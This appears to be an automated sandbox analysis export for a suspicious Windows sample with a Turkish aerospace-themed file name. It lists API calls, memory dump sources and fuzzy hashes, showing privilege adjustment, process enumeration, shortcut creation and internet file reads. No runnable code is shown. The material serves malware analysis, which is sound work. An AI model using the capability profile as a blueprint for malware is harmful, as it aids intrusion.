• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
• Instruction ID: 670a0f23cae3ec4601a8a73cd6053e49a11ea6c80efead6be667c0108bb3f382
• Opcode Fuzzy Hash: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
• Instruction Fuzzy Hash: 7A11E7717001216FEB315F2ADC44AAEBBE9FF457A1F548068F9C5D3241CBB8D8018BA8
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
• Instruction ID: 578e9a5683c6ad83ee1a43e7ad780f598e95dbb9a1a9d0869647d459ca5e1c0e
• Opcode Fuzzy Hash: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
• Instruction Fuzzy Hash: 3DF04431640205AFDB301E65DC8DE773BBCEF457E5B600115F645C6250CB659C42DB60
APIs
• CoInitialize.OLE32(00000000), ref: 0100C432
• CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100C44A
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• CoUninitialize.OLE32 ref: 0100C6B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
• Instruction ID: 67e449088993bf2f5256eb27139dbd7f0f63f0c85d530651fbf58c068432dbe7
• Opcode Fuzzy Hash: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
• Instruction Fuzzy Hash: 8FA13AB1108205AFD700EF54CC81EABB7ECEF89354F00492CF1959B1A2DBB5EA09CB52
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AD0), ref: 00FA4B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4B57
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
• Instruction ID: ebc6d9139b383b5e8a6f53b48b60b613de144aab02347c3165f29fce8eb69632
• Opcode Fuzzy Hash: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
• Instruction Fuzzy Hash: EAD01274A10723CFD7309F32D828B06B6F4AF867D1B21882DD4C5D6100D7B4E880C764
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: 674e01c9df112c2558dc2496b1a74b9b61d8c81e75cbd1aec7cc3db74e55e4eb
• Instruction ID: 08c702879bec1227a199222c127bf9b3515c2ac70390ddda464b6b660e7b62ea
• Opcode Fuzzy Hash: 674e01c9df112c2558dc2496b1a74b9b61d8c81e75cbd1aec7cc3db74e55e4eb
• Instruction Fuzzy Hash: 6022BC71A083419FC724DF25C881BAFB7E4AF85750F14492CF88A97291DB79E904EF92
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0101EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0101EE4B
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• Process32NextW.KERNEL32(00000000,?), ref: 0101EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0101EF1A
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
• Instruction ID: 8b9c27e389488a9a139d51132f80ad4b3ff87cb0337bb0e80bc079e58a6f866f
• Opcode Fuzzy Hash: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
• Instruction Fuzzy Hash: 59517EB15083019FD321EF24CC81E6BB7E8EF99750F50482DF99597291EB78E908DB92
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: 780d001d6c705d5e8a44142abf15218a589dbc670da6e6a97240588f01bd5a2a
• Instruction ID: 8c231c3f5693b8b76a500ba84f1866371867c8867b8f24bfb631d84414d0e412
• Opcode Fuzzy Hash: 780d001d6c705d5e8a44142abf15218a589dbc670da6e6a97240588f01bd5a2a
• Instruction Fuzzy Hash: CA926771A083418FD720DF15C480B6BB7E1BF89314F14896DE88A9B262DB75EC45EF92
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FFE628
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
• Instruction ID: 149df8bf2543ee9bca8f0b22553a161481a48c4b683cbf9f2434c7ef7a8ab6e6
• Opcode Fuzzy Hash: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
• Instruction Fuzzy Hash: FD322575A007099FD728DF19C481A6AB7F1FF48320B15C46EE99ADB3B1EB70A941CB44
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0101180A,00000000), ref: 010123E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01012418
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: dec32d97d36a0705ffe9f0d9312139c3715db4cd9a827f82ca20bfd648e052a6
• Instruction ID: 40fcfb9d35cb994f4fadb2efd0f30e87e7003c9f165f655af39c649db3ae41bc
• Opcode Fuzzy Hash: dec32d97d36a0705ffe9f0d9312139c3715db4cd9a827f82ca20bfd648e052a6
• Instruction Fuzzy Hash: FC41F57190420ABFEB20DE99DC81FBFB7FCEB40314F20806EF681A6145DB799E419660
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0100B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0100B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0100B3EA
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
• Instruction ID: 93a38b8675a0c632efaa003dcd20690f2e92d263f3bc1f95a44e2608236fb40b
• Opcode Fuzzy Hash: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
• Instruction Fuzzy Hash: 98217175A00108EFDB00EFA5D881AEEBBB8FF49314F1480A9E945AB355CB359915DB50
APIs
  • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
  • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
• GetLastError.KERNEL32 ref: 00FF8865
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 736d6d857794411dde3d50156ad5b1c8bd268fc5d041b2fc689e3202f232d925
• Instruction ID: cc4541fdd1177566859c255f19867f3249497925668762d8ec97a995f23bc5d7
• Opcode Fuzzy Hash: 736d6d857794411dde3d50156ad5b1c8bd268fc5d041b2fc689e3202f232d925
• Instruction Fuzzy Hash: 2E1190B2814205AFD728DF54DC86D2BB7BCEF04750B20852EF45687201DE34AC41CB60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF878B
• FreeSid.ADVAPI32(?), ref: 00FF879B
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
• Instruction ID: 196c4cf03c57e68e66ffb3bed332c9bade4faf162af1df3ee70e19a749936297
• Opcode Fuzzy Hash: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
• Instruction Fuzzy Hash: 20F03775A1120DBBDB10DEE49989AAEBBBCEF08211F5044A9EA01E2180E6796A048B50
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0100C6FB
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100C72B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                                                                                    • Instruction ID: f9e2606664d6d792c24e02576c9b45fdc2800d22adeb4888a29862fe1fd269f7
                                                                                                                                    • Opcode Fuzzy Hash: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                                                                                    • Instruction Fuzzy Hash: 0C11A1726046049FDB10DF29CC45A2AF7E8FF85324F44865DF9A9D7291DB78A805CB81
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A097
                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A0A9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                    • Opcode ID: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                                                                                    • Instruction ID: 6cde32cfb1a9291c93bda04c682974366a99fcd48ea5ab13b54ee84b144b69b1
                                                                                                                                    • Opcode Fuzzy Hash: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                                                                                    • Instruction Fuzzy Hash: 67F0823520532DBBDB21AEA4CC48FEA776DBF097A1F008156F949D7181D6349544CBA1
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                    • Opcode ID: 85682b4432fd441f9755f8efdfc1d95f3fa19a590659c54828a4a3d5d35965a9
                                                                                                                                    • Instruction ID: 8650d691053d870b973c160b6a5e020fb3e2f85bb3c3de6c7a7fc6e2a4e04428
                                                                                                                                    • Opcode Fuzzy Hash: 85682b4432fd441f9755f8efdfc1d95f3fa19a590659c54828a4a3d5d35965a9
                                                                                                                                    • Instruction Fuzzy Hash: 7EE0BF71010512EEE7352B60EC05E7777A9EF04350B24895DF595C4474DB666C91EB10
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC8D57,?,?,?,00000001), ref: 00FCA15A
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FCA163
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                                                                                    • Instruction ID: c7db986df3a87042823c09eaa46304b7afd2c0f8abbf447ecc89791cb938edfe
                                                                                                                                    • Opcode Fuzzy Hash: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                                                                                    • Instruction Fuzzy Hash: C2B0923105420AEBCA202F91E809B883F78EB44AE2F508010F64D84054CBE754508B91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                                                                                    • Instruction ID: 4fea84e222a24523393ba61589c6392c58e9fccf3702f440e28380b6dba1438f
                                                                                                                                    • Opcode Fuzzy Hash: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                                                                                    • Instruction Fuzzy Hash: C0322272D29F024DD7279534C932335A25DAFB73D4F14C73BE85AB59AAEB29C4835200
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                                                                                    • Instruction ID: 25b7becff4665a5e0b194fa5c32d95634a3e2ca783edef8b4866fdb2d62a19ef
                                                                                                                                    • Opcode Fuzzy Hash: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
